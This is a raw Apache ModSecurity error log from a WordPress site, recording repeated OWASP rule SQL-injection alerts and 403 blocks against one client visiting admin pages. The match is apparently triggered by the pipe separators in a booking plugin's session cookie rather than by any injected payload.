[Mon May 11 18:33:25.518918 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE1UWKUxpmnkK7zHyr7AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:26.379655 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE1UWKUxpmnkK7zHyr7AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:26.683943 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE1kWKUxpmnkK7zHyr7QAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:26.684378 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE1kWKUxpmnkK7zHyr7QAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:27.678419 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE1kWKUxpmnkK7zHyr7QAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:27.966180 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE10WKUxpmnkK7zHyr7wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:27.966473 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE10WKUxpmnkK7zHyr7wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:28.761364 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE10WKUxpmnkK7zHyr7wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:28.999731 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE2EWKUxpmnkK7zHyr8gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:29.000024 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE2EWKUxpmnkK7zHyr8gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:29.909063 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE2EWKUxpmnkK7zHyr8gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:30.052027 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE2kWKUxpmnkK7zHyr8wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:30.052326 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE2kWKUxpmnkK7zHyr8wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:30.430759 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE2kWKUxpmnkK7zHyr8wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:30.730027 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE2kWKUxpmnkK7zHyr9QAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:30.730343 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE2kWKUxpmnkK7zHyr9QAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:31.345010 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE2kWKUxpmnkK7zHyr9QAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:31.676236 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE20WKUxpmnkK7zHyr9gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:31.676521 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE20WKUxpmnkK7zHyr9gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:32.284335 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE20WKUxpmnkK7zHyr9gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:32.537452 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE3EWKUxpmnkK7zHyr-AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:32.537757 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE3EWKUxpmnkK7zHyr-AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:33.249753 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE3EWKUxpmnkK7zHyr-AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:33.510525 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE3UWKUxpmnkK7zHyr-gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:33.510890 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE3UWKUxpmnkK7zHyr-gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:34.189632 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE3UWKUxpmnkK7zHyr-gAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:34.308092 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE3kWKUxpmnkK7zHyr-wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:34.308398 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE3kWKUxpmnkK7zHyr-wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:34.879260 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE3kWKUxpmnkK7zHyr-wAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:35.167899 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE30WKUxpmnkK7zHyr_AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:35.168203 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE30WKUxpmnkK7zHyr_AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:35.798071 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE30WKUxpmnkK7zHyr_AAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:36.268382 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE4EWKUxpmnkK7zHysAAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:36.268679 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE4EWKUxpmnkK7zHysAAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:37.418864 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE4EWKUxpmnkK7zHysAAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:38.246709 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE4kWKUxpmnkK7zHysAwAAARM"], referer: https://rentparadise.fr/wp-login.php
